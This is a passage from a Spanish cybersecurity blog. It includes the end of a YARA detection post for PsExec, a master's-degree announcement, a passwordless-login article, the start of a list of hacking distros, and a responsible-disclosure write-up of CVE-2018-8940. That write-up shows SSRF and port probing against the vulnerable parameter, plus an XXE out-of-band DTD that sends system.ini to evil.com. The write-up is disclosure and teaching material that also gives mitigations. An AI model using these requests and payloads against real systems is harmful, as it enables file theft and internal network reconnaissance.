"a283e768fa12ef33087f07b01f82d6dd" or hash.md5(0, filesize) == "f19c18db99d231f63935fcd7c6347219" } Vemos su funcionamiento. $ find . -iname "psexec.exe" | awk '{system("yara psexec.yar "$1)}' | head -20 detected_psexec ./sysinternals/20171121052032/PsExec.exe detected_psexec ./sysinternals/20070123230553/psexec.exe detected_psexec ./sysinternals/20160610232411/PsExec.exe detected_psexec ./sysinternals/20070104200744/psexec.exe detected_psexec ./sysinternals/20161220065806/PsExec.exe detected_psexec ./sysinternals/20120112064343/PsExec.exe detected_psexec ./sysinternals/20160331150947/PsExec.exe detected_psexec ./sysinternals/20160303071325/PsExec.exe detected_psexec ./sysinternals/20161129052051/PsExec.exe detected_psexec ./sysinternals/20160903091120/PsExec.exe detected_psexec ./sysinternals/20100201154325/psexec.exe detected_psexec ./sysinternals/20110815082858/PsExec.exe detected_psexec ./sysinternals/20170308221855/PsExec.exe detected_psexec ./sysinternals/20170117061351/PsExec.exe detected_psexec ./sysinternals/20120303053843/PsExec.exe detected_psexec ./sysinternals/20180412141809/PsExec.exe detected_psexec ./sysinternals/20170103065049/PsExec.exe detected_psexec ./sysinternals/20070128181721/psexec.exe detected_psexec ./sysinternals/20061231003824/psexec.exe detected_psexec ./sysinternals/20150213140441/PsExec.exe Lo mismo ocurre para el servicio. $ yara psexec.yar PSEXESVC.exe detected_psexesvc PSEXESVC.ex Espero que os haya gustado. Hasta otra!! --- # Nuevo máster en ciberseguridad de la Universidad de Alcalá URL: https://ciberseguridad.blog/nuevo-master-en-ciberseguridad-de-la-universidad-de-alcala/ Tipo: Artículo Autor: Iván.Marsá Publicado: 2019-05-25 Actualizado: 2026-10-08 Tema: Curso y Master en Ciberseguridad > Un master en ciberseguridad que cubre la falta de gente con una base general sólida y te prepara para un sector tan cambiante como la seguridad. ¡ATRÉVETE! Nos ha comentado Rubén que los lectores del blog estabais interesádos por nuestro máster, preguntándo en comentarios sobre los mejores masters en ciberseguridad, y se ha puesto en contacto con nosotros, con el fin de actualizar una lista que se remonta a 2017. Por ello, nos ha ofrecido la posibilidad de escribir una entrada para intentar aclarar un poco vuestras dudas, así que aquí estoy, como director del máster, especialmente agradecido de poder llegar hasta vosotros de la mano de Ciberseguridad.blog. Supongo que lo primero que debería hacer es intentar responder de forma directa a la pregunta clave que uno se hace cuando aparece un nuevo estudio en escena, y especialmente si es de posgrado: ## ¿Por qué querría yo cursar el Máster Universitario en Ciberseguridad de la Universidad de Alcalá? [Imagen: Logotipo del Máster Universitario en Ciberseguridad de la Universidad de Alcalá] Con la gorra de director, obviamente interesado en hacer publicidad, más o menos ésta sería mi respuesta. Porque es un máster oficial en el que aprenderéis, en tan sólo un curso, todo lo necesario para empezar a trabajaren cualquiera de las áreas de la Ciberseguridad, y todo ello de forma eminentemente práctica, con una atención personalizada por parte de profesores con una amplia experiencia, en contacto con la actualidad de la disciplina y realizando prácticas en empresas españolas de primer nivel. Por supuesto, no tenéis por qué creerme (al fin y al cabo, soy parte interesada), así que permitidme que elabore un poco más para daros toda la información posible. El sector de la Ciberseguridad es quizás el que mayor velocidad de cambio tiene ahora mismo de todos los sectores tecnológicos. Uno de los comentarios que más nos llegaban desde nuestros contactos en las empresas era la falta de gente con una base general sólida que les permitiera ser flexibles dentro de este sector tan cambiante. Por eso, nos planteamos estructurar el máster en cuatro áreas que lo abarcaran todo: - “Seguridad de la Información y las Comunicaciones” - “Seguridad en el Software y en los Componentes” - “Sistemas de Seguridad” - “Gestión y Organización de la Seguridad” Cada una de estas cuatro áreas se compone de dos asignaturas obligatorias, que nos permiten cubrir en secuencia todos los grandes temas de la Ciberseguridad. Así, a lo largo de los dos primeros trimestres, recibirás una formación que te permitirá descubrir si quieres ser, por ejemplo, perito informático forense o analista de malware o especializarte en el uso de big data para ciberseguridad. Eso te permitirá orientar adecuadamente tanto las optativas como las prácticas externas y el TFM para colocarte, al finalizar el máster, en la mejor posición posible para hacer de tu vocación una realidad. Y durante este proceso no estarás solo. Formarás parte de un grupo reducido de 25 estudiantes, lo que nos permitirá ofreceros una experiencia de aprendizaje más personalizada y flexible. Tendréis a vuestra disposición a un equipo de profesores con una amplísima experiencia tanto enseñando ciberseguridad como investigando sobre ella. Es cierto que arrancamos ahora la primera edición de este Máster, pero nuestro equipo de profesores lleva enseñando ciberseguridad a nivel de Ingeniería, Grado, Máster y Doctorado desde el año 2000. Y todo con el aval de la Universidad de Alcalá, una de las universidades españolas mejor posicionadas en empleabilidad, y de la Escuela Politécnica Superior, que tiene dos de sus titulaciones entre las cinco primeras de España. Es difícil hablar de credenciales cuando empiezas un proyecto, pero INCIBE ha seleccionado nuestro máster dentro de su programa de becas con la Fundación Carolina. Creo que es señal de que vamos por buen camino. Algunos de los profesores que impartimos el máster somos pioneros en el uso de metodologías de aprendizaje activo en el aula, tanto en grado como en máster. Os aseguro que sabemos sacar partido a las ventajas de la enseñanza presencial de forma práctica, y siempre desde la actualidad de la disciplina. Por poneros un ejemplo, damos una asignatura de ciberseguridad este cuatrimestre, y en las últimas semanas hemos hablado de Sea Turtle, Barium, Triton, Dragonblood y MDS. No se trata sólo de que tengáis una base sólida sobre ciberseguridad, sino de que adquiráis las competencias para manteneros al día en esta disciplina, que no es fácil. Nuestro equipo de profesores también tiene una dilatada experiencia investigadora y profesional en diferentes ámbitos de la ciberseguridad. Contamos con expertos en criptografía, big data, delitos informáticos, protocolos… y hemos participado en proyectos de investigación puntera en ciberseguridad y ciberdefensa, tanto con empresas (por ejemplo, con ISDEFE) como con instituciones a nivel estatal (Guardia Civil, Ministerio de Defensa…) y europeo (con la EDA, por ejemplo). Esta experiencia nos da una perspectiva idónea para diseñar prácticas y ejercicios que faciliten vuestra formación, además de proporcionaros oportunidades de aprendizaje adicionales en contacto con los desafíos más recientes del sector. Otro de los aspectos cruciales del máster son las prácticas externas. Harás un mínimo de 6 ECTS de prácticas obligatorias, lo que te permitirá tener un contacto real con el ejercicio profesional en una empresa de primer nivel en el sector. Nuestra Escuela tiene convenios firmados con más de 300 empresas. No quiero citar empresas específicas hasta que no se hayan hecho prácticas de este máster (que no empezarán hasta abril de 2020), pero podéis haceros una idea de nuestros contactos y colaboraciones a partir de los programas de las jornadas CIBERSEG, que llevamos organizando con gran éxito desde hace ya más de seis años, y en las que hemos contado con la inestimable colaboración de ponentes del máximo nivel procedentes de diferentes empresas. Estamos negociando con ellos para poder ofreceros prácticas en sus equipos y laboratorios, y también para poder contar con su presencia en seminarios y talleres en las últimas sesiones del curso. Si queréis saber más sobre el máster, tenéis toda la información oficial en la web de la Escuela de Posgrado, y una versión más amigable en masterciberseguridad.uah.es . También podéis seguir en Twitter las últimas noticias o, si queréis algo más específico, podéis directamente escribirme. Parafraseando un anuncio mítico de los 80, buscad, comparad y elegid. Os esperamos. --- # Responsible Disclosure [ CVE-2018-8940 ] URL: https://ciberseguridad.blog/responsible-disclosure-cve-2018-8940/ Tipo: Artículo Autor: David.Herrero Publicado: 2019-05-16 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Una Responsible Disclosure es una vulnerabilidades en producto que se desconocía hasta el momento, y en este post os contamos la CVE-2018-8940. ¡ ATREVETE ! Durante las revisiones que se realizan en un Pentesting o Descubrimiento de vulnerabilidades de una aplicación web se suelen dar tres casos principales: - Se encuentran productos con vulnerabilidades conocidas - Existen problemas en la personalización o en la lógica de negocio de la aplicación, por lo que la vulnerabilidad solo aplica a este cliente - Se encuentran vulnerabilidades en algún producto utilizado, pero que se desconocían hasta el momento. Este último caso suele ser el menos frecuente, por lo que siempre hace ilusión encontrar una nueva vulnerabilidad en un producto comercial. No vamos a explicar ahora el método para realizar un Responsible Disclosure, simplemente indicar que siempre intentamos que el fabricante pueda lanzar un parche y corregir los problemas antes de hacer públicas las vulnerabilidades. ## Precedentes Antes de explicar la nueva vulnerabilidad encontrada, un rápido vistazo al TOP 10 de OWASP de 2017. [Imagen: TOP 10 de OWASP de 2017] Lo más interesante en este caso ha sido la nueva vulnerabilidad de “XML External Entities (XXE)”, no solamente por que se trata de una nueva vulnerabilidad que no aparecía en el Top 10 de 2013, sino porque además aparece directamente en el puesto 4. Este tipo de vulnerabilidades se conocen desde hace mucho tiempo, y se pueden utilizar para muchos ataques más complejos. Además, son fácilmente solucionables. Sin embargo se siguen produciendo debido en muchos casos por desconocimiento, muchas veces los desarrolladores no conocen que un parser de XML puede llegar a resultar peligroso, y se utilizan las configuraciones por defecto, en muchos casos vulnerables. ## La vulnerabilidad CVE-2018-8940 Durante una revisión rutinaria, me topé con esta petición en el proxy: GET /TouchPoint/api/ClientServiceConfig/GetClientServiceVersion? &clientInstallationServiceXmlPath=https:%2F%2FVICTIMDOMAIL%2FTou chPoint%2FClientServices%2FClientInstallationService%2FClientIns tallationService.xml¤tVersion=7.2.5.102 Al momento saltan las alarmas, el parámetro clientInstallationServiceXmlPath hace referencia a una URL externa. - ¿Es posible que esta petición haga que la aplicación se conecte a dicha URL y se descargue el fichero? - Además de URLs con protocolo HTTP, ¿Es posible utilizar otros protocolos como file://? - Además, el fichero es un .xml, utilizará un parser para navegar por el contenido del fichero XML? A partir de estas tres simples preguntas ha sido posible descubrir tres vulnerabilidades distintas en el mismo producto. ### Local file check Si en esta petición, en vez de intentar cargar un recurso alojado en internet mediante el protocolo HTTP, intentamos cargar un fichero local, podemos utilizar la aplicación para comprobar si en la máquina local donde se está ejecutando existen unos ficheros o no: [Imagen: Petición y respuesta en Burp comprobando la ruta C:\Users\administrator con acceso denegado] Si el fichero no existe: [Imagen: Petición y respuesta en Burp comprobando la ruta C:\Users\david inexistente en el servidor] Con estas dos simples peticiones ya sabemos que se trata de una máquina Windows, con usuario administrador en local. Se puede utilizar esta funcionalidad para recabar mucha más información sobre el sistema. Como os habréis dado cuenta, la petición no tiene ningún tipo de cookie, no es necesario estar autenticado en la aplicación para que este ataque funcione. ### SSRF ¿Y si en vez de pedir un fichero local, o un fichero alojado en internet, intentamos pedir un fichero alojado en la propia máquina, pero en otro puerto? Podemos utilizar esta funcionalidad para enumerar los puertos abiertos de la propia máquina, y si tenemos información sobre la IP interna, para realizar un escaneo de la red interna. Por ejemplo, una petición a 127.0.0.1:80 indica que el puerto está abierto y que hay un servidor HTTP: [Imagen: Petición SSRF en Burp apuntando a 127.0.0.1 puerto 80 con respuesta 404] Si cambiamos el puerto 80 por el 22 por ejemplo: [Imagen: Petición SSRF en Burp probando el puerto 22 con conexión rechazada por el sistema] Podemos ver que el error es totalmente distinto, si por ejemplo realizamos la misma petición contra un puerto que sí está abierto, pero que no utiliza el protocolo HTTP (rdp por ejemplo), vemos que el mensaje también es distinto: [Imagen: Petición SSRF en Burp probando el puerto 3389 con tiempo de espera agotado] ## XML External Entities (XXE) · Y llegamos a la guinda del pastel, ya hemos visto antes que el parámetro vulnerable clientInstallationServiceXmlPath accede al fichero que le indiquemos para tratarlo, si nos fijamos en los mensajes de error podemos comprobar que las librerías utilizadas para leer el fichero son: - System.Xml.XmlDownloadManager - System.Xml.XmlTextReaderImpl - System.Xml.XmlLoader Parece claro que se están utilizando librerías .Net para leer el fichero XML, y que no se accede al fichero simplemente como “texto plano”. Haciendo una rápida visita al pasado, XML, además de definir las reglas para generar documentos bien formados y con una estructura sintáctica correcta, también hace referencia a otros muchos tipos de documentos, funciones, transformaciones, etc. Podemos decir que existe una gran familia de estándares relacionados con XML. Uno de estos estándares de los que hablamos son los DTD (Document Type Definition), se dice que un documento XML: - Está “bien formado” si utiliza una sintaxis correcta. - Si además se valida correctamente contra un DTD, también es válido. Un DTD no deja de ser un documento escrito mediante sintaxis XML que indica como debería estar formado otro documento XML, con un ejemplo se entiende: [Imagen: Ejemplo de documento XML con DOCTYPE y DTD externo con anotaciones explicativas en español] Los ficheros DTD pueden definir lógicas más complejas, como que un elemento solo puede aparecer un número n de veces, o que debe ser opcional/obligatorio, etc. Además, los DTD se pueden incluir dentro del propio fichero XML original: [Imagen: Ejemplo de XML con entidades declaradas ENTITY writer y copyright anotado en español] Se puede encontrar mucha más información sobre XML y DTDs en la web de la w3c. Si nos fijamos en el último ejemplo, podemos ver que podemos crear entidades que se mapean con una cadena de texto, existen también las “entidades externas”, que hacen básicamente lo mismo, pero pueden mapearse con el contenido de ficheros enteros que se leen directamente desde disco. Aquí reside el verdadero poder de las entidades externas: En este caso, la entidad “&writer;” está almacenando el contenido de “entities.dtd”. Y en este caso, la entidad “&xxe;” almacena el contenido del /etc/passwd. Interesante ¿verdad?, vamos a juntar todo lo aprendido en este post, para poder leer fichero de la máquina en la que se está ejecutando el parser XML. En el caso de este producto, es necesario realizar un ataque XXE OOB (XXE Out of Bounds), ya que la aplicación no nos muestra el resultado del “parser”, por eso la explotación es algo más complicada, aunque sigue los principios básicos explicados anteriormente. Vamos a crear dos ficheros XML distintos: XXE.xml %dtd; ] > &send; Es un fichero XML con un DTD incrustado, básicamente declaramos una entidad externa llamada “dtd” que va a cargar otro fichero “XXE.dtd”. Cuando el parser lee un fichero mediante una entidad externa comprueba si se trata de un fichero XML, si lo es, intenta parsearlo también. Es decir, estamos forzando a la aplicación a parsear dos ficheros XML distintos. "> %alla; En este caso creamos una entidad externa llamada “file” que va a almacenar el contenido del fichero “C:\windows\system.ini”, luego creamos otra entidad externa llamada “allá” que intentará cargar el contenido del fichero ubicado en hxxp://evil.com/index.html?collect=%file;. En este caso como la entidad file está almacenando el contenido del fichero system.ini, lo enviará URL encodeado al dominio controlado “evil.com” y en los logs del servidor web podremos ver el contenido de dicho fichero. Finalmente, la entidad externa “send” es la que desencadena la petición URL, y está referenciada en el fichero XXE.xml inicial. Puede parecer un proceso algo “lioso”, pero simplemente hay que generar los ficheros en base a los estándares XML y DTD, y el parser que utilice la aplicación víctima hará todo el trabajo. El proceso completo por lo tanto es el siguiente: [Imagen: Editor de código mostrando el fichero XXE.xml que carga un DTD externo por HTTP] [Imagen: Editor de código mostrando el fichero XXE.dtd que exfiltra system.ini al atacante] [Imagen: Petición en Burp cargando el fichero XXE.xml desde un servidor controlado por el atacante] Aunque el parser de un fallo, podemos comprobar que el contenido del fichero system.ini se ha enviado como parámetro de una petición GET al atacante. [Imagen: Terminal con netcat escuchando en el puerto 61111 y recibiendo el contenido de system.ini] ### Conclusiones Hemos visto como un simple parámetro de una web que permite cargar un fichero XML nos permite realizar múltiples ataques: - Listar ficheros internos - Enumerar puertos abiertos - Leer ficheros internos Todo se produce por la unión de dos errores básicos: - Permitir al usuario especificar cualquier fichero a leer por la aplicación - Tener habilitado en el parser de XML la ejecución de las instrucciones DTD El primer fallo se soluciona implementando medidas de filtrado y/o lista blanca en el posible valor del parámetro clientInstallationServiceXmlPath. El segundo fallo es aún más sencillo de solucionar, a la hora de crear el objeto XmlTextReader de .Net, hay que habilitar el flag de “ProhibitDtd”. [Imagen: Código C# mostrando DtdProcessing.Prohibit como mitigación para XXE en XmlTextReader] ## Fechas y referencias - 03/21/2018 - Discovered Vulnerability - 03/21/2018 - Request for CVE - 03/22/2018 - CVE Reserved - 03/26/2018 - Details sent to Vendor - 04/14/2019 - Vendor confirms that version 7.2.9 correct the vulnerability - 05/08/2019 - Public disclosure Responsible Disclosure Mayo 2019 --- # Passwordless o cómo las contraseñas han muerto URL: https://ciberseguridad.blog/passwordless-o-como-las-contrasenas-han-muerto/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-05-12 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > La experiencia passwordless será abrumadoramente positiva. Las contraseñas han muerto en los inicios de sesión. ¡ CONOCE MÁS ! ¿Cuántas password tienes para todas las webs, redes sociales, tiendas, bancos, trabajo, entretenimiento ... ? pero lo mejor aún, ¿cuantas usáis?. Si tenéis un sitio web o un negocio online, es normal que necesitáis que los usuarios creen cuentas con contraseñas. Una situación normal que está alejando activamente a los clientes y visitantes, convirtiendo nuestros ratios de conversión. El 75% de los usuarios abandonan las webs después de restablecer la contraseña, y el 30% de los clientes online abandonan sus carritos de compra si se les obliga a registrarse y crear una contraseña. Una experiencia de cliente terrible, que impulsan a los gigantes de Internet, y se alejan de sitios y negocios minoristas. Se podría argumentar que las contraseñas cumplen una función de seguridad imprescindible, pero "a estas alturas de la película", es algo incorrecto. Hay muchos detractores, hay quien dice que es una practica necesaria, o que al forzar a los usuarios a crear otra contraseña simplemente dará como resultado la creación de contraseñas más débiles. Y es que, es muy probable que se reutilice una contraseña extremadamente simple una y otra vez por conveniencia (El típico +1). Incluso con una contraseña segura, la seguridad no es tan estricta como parece (Siempre que podamos, tenemos que poner otro varios factores de autenticación). Estamos entrando en una nueva etapa: ¡las contraseñas causan más daño que beneficio en un Internet claramente listo para pasar al próximo capítulo!. La evolución Passwordless Passwordless, reemplazará todas las contraseñas con técnicas de encriptación altamente seguras e increíblemente rápidas, a la vez que brindará a los sitios web la capacidad de autenticar correctamente a sus usuarios. Pero claro, os surgirán muchas preguntas al respecto de la evolución Passwordless: [Vídeo](https://www.youtube.com/watch?v=6fSzKYPXD8k) Los datos confidenciales no tienen que protegerse detrás de capas extremadamente finas de seguridad con contraseña, ya podemos dar un paso más allá. ## Cómo funciona Passwordless Comenzamos con la definición más básica: Los sistemas de inicio de sesión sin contraseña son herramientas que los sitios web pueden implementar para que sus usuarios no tengan que iniciar sesión a través de una contraseña. Pero ... esto no significa que los usuarios simplemente ingresen al sitio sin ningún tipo de autenticación. Con cualquier tipo de inicio de sesión sin contraseña, los usuarios aún tienen que verificar sus identidades con una o más formas de autenticación (pero no con contraseñas). Cada sistema de inicio de sesión sin contraseña funciona de forma "un poco" diferente, por lo que vamos a ver alguna de ellas: ### Autenticación Passwordless en correo electrónico El método de autenticación passwordless más prometedor, los sistemas basados en correo electrónico, verifican la identidad de un usuario mediante su dirección de correo electrónico y un código completo de clave cifrada. Pero, ¿Cómo funciona?. Los usuarios hacen clic para iniciar sesión. Esto genera un mensaje de correo electrónico a enviar, que contiene un código de clave DKIM cifrado. Cuando el usuario envía el correo electrónico, el servidor de inicio de sesión y el sitio web reciben, procesan y descifran el código. La identidad y dirección de correo electrónico del usuario se comparan con los registros del sitio web, y si todo es correcto, se permite el acceso. Su punto fuerto es que la autenticación mediante correo electrónico, es extremadamente rápida, ultra segura y elimina completamente la necesidad de que los usuarios creen nuevas contraseñas. Los métodos de autenticación de correo electrónico passwordless ya se están volviendo populares en ciertos contextos. Un gran ejemplo: webs de donaciones. Las donaciones se encuentran en la intersección entre la necesidad de una seguridad estricta y la necesidad de una experiencia de usuario impecable, ya que, hacer una donación debe ser rápido y seguro, de lo contrario, muchos donantes perderían su motivación. ### Autenticación Passwordless basada en tokens La autenticación basada en tokens y correo electrónico operan con conceptos similares. Con los sistemas basados en correo electrónico, la dirección de correo electrónico está asociada con una clave cifrada única que se procesa a través de servidores de seguridad. Con la autenticación basada en token, el servidor del sitio web envía un token cifrado único. Este token se adjunta a nuestro inicio de sesión y luego se descifra a medida que se solicitan varias acciones. Esto significa que es necesario verificar los permisos para ver contenido, hacer publicaciones, cada vez que comienza una nueva acción, etc.. . Al verificar la firma del token con nuestro algoritmo de seguridad, el sitio puede verificar de manera efectiva la identidad de los usuarios para múltiples acciones y subdominios, lo que reduce considerablemente la fricción de inicio de sesión en las acciones. La autenticación basada en token es extremadamente eficiente y flexible, pero puede ser difícil de implementar en algunos sitios. Las herramientas de autenticación basadas en correo electrónico funcionan a través de un concepto similar de claves encriptadas, por lo que a menudo son la forma más rápida en que los sitios web pueden comenzar con estas innovadoras técnicas de inicio de sesión, al contrario que la autenticación con tokens. ### Autenticación Passwordless Biométrica Creciendo en popularidad está la autenticación de huellas dactilar, facial, iris, esta última algo menos (también conocidas como biométrica). Es posible que ya utilices un escáner de huellas dactilares (En mi caso, lo tienen en el gimnasio) o rostro (FaceID de Apple). Probablemente no pienses en ellos en estos términos, pero son una forma de inicio de sesión sin contraseña. Para la autenticación de huellas digitales, los usuarios presionan con el pulgar en la cámara del lector de huellas digitales del teléfono para autorizar los pagos u obtener acceso a sus cuentas. Si bien esta técnica es intuitiva y segura, agiliza completamente el proceso de inicio de sesión, pero presenta algunos desafíos. Es decir, el acceso a la tecnología con un lector de huellas digitales puede ser costoso para algunos usuarios, aunque cada vez menos (Ya tenemos Xiaomis a 100€ con lector) y la tecnología es menos rentable de adoptar para las empresas. Desafortunadamente, estas tecnologías también han demostrado ser menos seguras de lo esperado. Las cámaras del lector de huellas digitales pequeñas solo registran partes de su huella digital, por ejemplo. Las probabilidades de que el dedo de otra persona coincida con esa parte de su propia impresión son sorprendentemente altas. Sin embargo, la biometría se está desarrollando rápidamente. Un sistema de inicio de sesión sin contraseña que utiliza la autenticación de correo electrónico cifrada y una biométrica verdaderamente segura podría cambiar por completo la forma en que nos usamos Internet. [Vídeo](https://www.youtube.com/watch?v=V9JOEhs3mNE) ## ¿Son los sistemas Passwordless más seguros? ¿Los sistemas de inicio de sesión basados en contraseñas son inseguros? Sí. ¿Son los sistemas passwordless más seguros? Tambien si. Si bien hay muchas maneras de hacer que las contraseñas sean más fuertes de forma activa, cambiándolas de forma temporal, evitando el uso de información que un ciberdelincuente podría aprender sobre nosotros, etc., pocas personas tomamon precauciones. Se debe principalmente a que estamos demasiado ocupados para lidiar con estas precauciones o simplemente, porque los sentimos como una pérdida de tiempo. Debido a esto, muchas personas usan la misma contraseña o variaciones similares. Esto crea un efecto dominó que permite a los cibercriminales acceder a varias cuentas con solo descifrar una sola contraseña. Como administrador web, la información de los usuarios podría estar en riesgo incluso estableciendo controles estrictos sobre las contraseñas. La falta de seguridad en otros sitios podría facilitar que los hackers obtengan información confidencial. Por ejemplo, si un pirata informático descifra la dirección de correo electrónico de un usuario, puede solicitar un cambio de contraseña en un sitio web, poniendo en peligro los datos de su usuario y haciéndolo responsable de la violación. Los sistemas de inicio Passwordless ofrecen una alternativa más inteligente. La autenticación de correo electrónico permite a sus nuevos usuarios registrarse simplemente ingresando su dirección de correo electrónico, donde tendrán un acceso seguro sin crear más y más vulnerabilidades debido a contraseñas débiles. Estos sistemas utilizan métodos de autenticación más avanzados que los sistemas de nombre de usuario / contraseña tradicionales. Mezclan datos confidenciales y descentralizan el acceso utilizando estas técnicas: - La tokenización es una forma de seguridad que genera aleatoriamente un token o una cadena de caracteres. Este token puede sustituir a los datos reales y es más difícil de descifrar porque no existe una relación matemática entre los datos reales y el token. - El cifrado es muy similar a la tokenización, pero utiliza un algoritmo para transformar información confidencial en texto cifrado. Este texto cifrado solo se puede descifrar con la clave de cifrado. ## ¿Cuáles son los beneficios de implementar un sistema de inicio de sesión Passwordless? Ahora que conocemos la seguridad de los inicios de sesión passwordless, es probable que nos preguntemos, qué otros beneficios tendrá la implementación de un sistema similar en una empresa (Recordamos que uno de los principales beneficios, era la experiencia de usuario, y esto no es una prioridad en el negocio). Las organizaciones buscan constantemente las mejores prácticas para que el proceso de inicio de sesión sea rápido y fácil. Los sistemas de inicio de sesión passwordless no solo simplifican el proceso, sino que también evitan a los usuarios la molestia de recordar una nueva contraseña. Si bien es esencial tener una cuenta si las organizaciones desean alentar a sus usuarios a realizar transacciones repetidas, es menos probable que los usuarios realicen nuevamente la acción si no pueden recordar su contraseña o la misma no es la usada habitualmente, la corporativa o sincronizada en los sistemas y de uso habitual. Los usuarios no tendrán que esforzarse para crear una contraseña que consideren segura, lo que puede ser uno de los aspectos que más tiempo llevan creando una cuenta. Además, es más probable que sus usuarios hagan compras impulsivas porque el proceso será mucho más fácil. La implementación de un sistema de inicio de sesión sin contraseña ahorra tiempo y elimina la frustración de tener que recordar y cambiar contraseñas. ## ¿Existe algún riesgo en el uso de passwordless? Al igual que con cualquier sistema nuevo que implemente nuestra organización, los sistemas de inicio de sesión sin contraseña vienen con su propio conjunto de riesgos. Pero en comparación con la debilidad de los sistemas de inicio de sesión tradicionales, los riesgos son relativamente bajos. Por supuesto, se tendrá que ver compatible con la infraestructura de nuestro sitio web. Los proveedores passwordless, suelen tener distinta medidas adicionales de seguridad, por ejemplo, si se recibe un intento de inicio de sesión de un dispositivo o dirección IP diferente, se enviará al usuario un mensaje de texto para confirmar que la solicitud fue realizada por el usuario. Otros sistemas de inicio de sesión passwordless tienen su propio conjunto de riesgos y desafíos. Por ejemplo, los cibercriminales pueden acceder a una cuenta protegida por datos biométricos creando una huella digital maestra utilizando las características más comunes de las huellas digitales, y los escáneres faciales pueden ser engañados utilizando fotos de alta calidad. Cada opción de inicio de sesión passwordless viene con su propio conjunto de riesgos, pero en comparación con los inicios de sesión con contraseña y nombre de usuario tradicionales, estas alternativas son mucho más seguras. ## ¿Qué organizaciones pueden usar el inicio de sesión passwordless? Los sistemas de inicio de sesión con contraseña son completamente universales, lo que significa que todas las organizaciones pueden usarlos. Lo interesante es que el inicio de sesión passwordless se puede usar para algo más que una forma de ingresar a nuestras cuentas. ### Acceso sin contraseña para empresas Nuestra empresa puede usar alternativas de contraseña para la seguridad interna, usuarios online o una combinación de ambas. Además, cualquier cuenta puede ser reemplazada con una contraseña segura alternativa. El inicio de sesión passwordless se puede utilizar para: - Inicio de sesión en una cuenta online. - Hacer pagos seguros a un sitio de comercio electrónico. - Regístrese para una suscripción o servicio. Al utilizar las opciones de inicio de sesión passwordless, podremos mantener segura la información del usuario y aplicar medidas de seguridad más estrictas para los empleados. ### Acceso sin contraseña para organizaciones sin fines de lucro o fundaciones Las organizaciones sin fines de lucro / fundaciones y basadas en la "confianza" pueden usar el inicio de sesión passwordless para hacer que el proceso de donación sea más fácil y más seguro para los participantes. Cuando los donantes donan a la organización, se pueden guardar la información de pago utilizando una contraseña alternativa como la autenticación de correo electrónico. ¡La próxima vez que un donante dé, la persona solo completará tres simples pasos! Las organizaciones son vulnerables a los ciberdelincuentes que desean obtener acceso a las base de datos.Como tal, las organizaciones, pueden implementar el correo electrónico, el token o la autenticación biométrica para los programas internos para que la información sea más segura. ## ¿Cómo de fácil es usar es el inicio de sesión passwordless? A medida que las contraseñas se vuelven más obsoletas, es posible que los usuarios ya estén familiarizados con alternativas de contraseña similares. Si alguna vez te has registrado en un sitio web con su cuenta de Facebook o Gmail, entonces has utilizado un formulario de inicio de sesión sin contraseña. Dicho esto, los usuarios ya tienen cierta comprensión de cómo funciona el proceso, por lo que hay una menor curva de aprendizaje. Los expertos destacan que los sistemas de inicio de sesión passwordless no requieren ninguna memorización. En general, el proceso requiere solo de dos a tres pasos y toma aproximadamente la misma cantidad de tiempo que un proceso de inicio de sesión tradicional. Pero, sin la molestia ni la responsabilidad de crear una contraseña segura, los usuarios pueden iniciar sesión y sentirse seguros de que la información está segura frente a usuarios no autorizados. ## ¿Cómo de difícil es implementar passwordless? Dado que existen varios tipos diferentes de inicio passwordless, el tiempo y el esfuerzo en implementarlos variarán. Pero en su mayor parte, estos sistemas se pueden implementar fácilmente en las webs. Deberemos: - Primero, evaluar la arquitectura del sitio existente para determinar el mejor proceso de implementación. - En segundo lugar, los desarrolladores incorporarán la autenticación en la infraestructura de la web. - Por último, la organización ya podría utilizar las distintas herramientas internamente y para usuarios con poca configuración. Alternativamente, si nuestra organización quierese usar datos biométricos, el proceso de implementación llevaría mucho más tiempo. No solo necesitaríamos el software integrado en nuestra web, sino que también tendríamos que asegurarnos que el programa funcione en todo el parque de móviles o similares. ## ¿Cómo promover el inicio de sesión passwordless? Al igual que con cualquier nuevo método o proceso, nuestros usuarios dudarán sobre el uso de sistemas de inicio de sesión sin contraseñas. Es probable que cuestionen su seguridad o su facilidad de uso. Si deseamos que las personas utilicen los sistemas de inicio de sesión sin contraseña, debemos poder tranquilizar previamente sus preocupaciones, mostrandoles primeramente cómo funciona. Cómo promover el sistema de inicio de sesión passwordless: - Crea un video para publicar. Crea un video que muestre a los usuarios cómo funciona el proceso de autenticación, ya sea que estemos utilizando el correo electrónico o la verificación de huella dactilar, al mostrarles a los usuarios todos los pasos , hará que esten más familiarizados y cómodos con el proceso. [Vídeo](https://www.youtube.com/watch?v=mqrclOOgzcY) - Haz que en un evento se demuestre el proceso. Mostrando lo fácil que es configurar y usar un sistema de inicio de sesión sin contraseña. - Asegúrate de vincular a otros recursos donde se pueda obtener más información sobre el proceso e incluir un enlace donde puedan iniciar sesión. - Participar con los usuarios en las redes sociales y sobre todo dar feedback. Anima a los usuarios a hacer preguntas en Facebook y Twitter o en redes corporativas como Wordplaces. Así, podremos responder a las inquietudes que más interesen. ## Conclusión No podemos afirmar que la autenticación passwordless funcione en todas las posibilidades y sistemas, pero sí podemos afirmar que la experiencia será abrumadoramente positiva. Deberíamos hacer que todas las explicaciones empiecen a ser "sin contraseña" a partir de ahora. ¿Has implementado la autenticación passwordless? ¿Fue una buena o mala experiencia? cuéntanos todo lo que consideres comentarios. --- # 12 de las mejores distros para hacking URL: https://ciberseguridad.blog/12-de-las-mejores-distros-para-hacking/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-04-21 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Conoce las mejores distribuciones y Sistemas Operativos para hacking y análisis forense con las que trabajan los grandes hackers. ¡ ATRÉVETE ! ¿Estas buscando la mejor distribución Linux para aprender hacking?. Si deseas seguir continuar tu carrera de ciberseguridad, ya estás trabajando como profesional de la seguridad informática o si simplemente está interesado en este campo específico de conocimiento, es imprescindible una buena distribución Linux que se adapte a tal propósito. Hay innumerables distribuciones de Linux para varios propósitos concretos. Vamos a echar un vistazo a una lista de algunas de las mejores distribuciones de Linux para aprender sobre Hacking y pruebas de penetración. ## Las mejores distribuciones Linux para hacking. Vamos a enumerar varias distribuciones de Linux centradas en la seguridad informática / ciberseguridad. Estas distribuciones de Linux proporcionan varias herramientas que son necesarias para evaluar la seguridad de la red u otras tareas similares, teniendo en cuenta que la lista no está en ningún orden en particular. ### Kali Linux [Imagen: Menú de aplicaciones de Kali 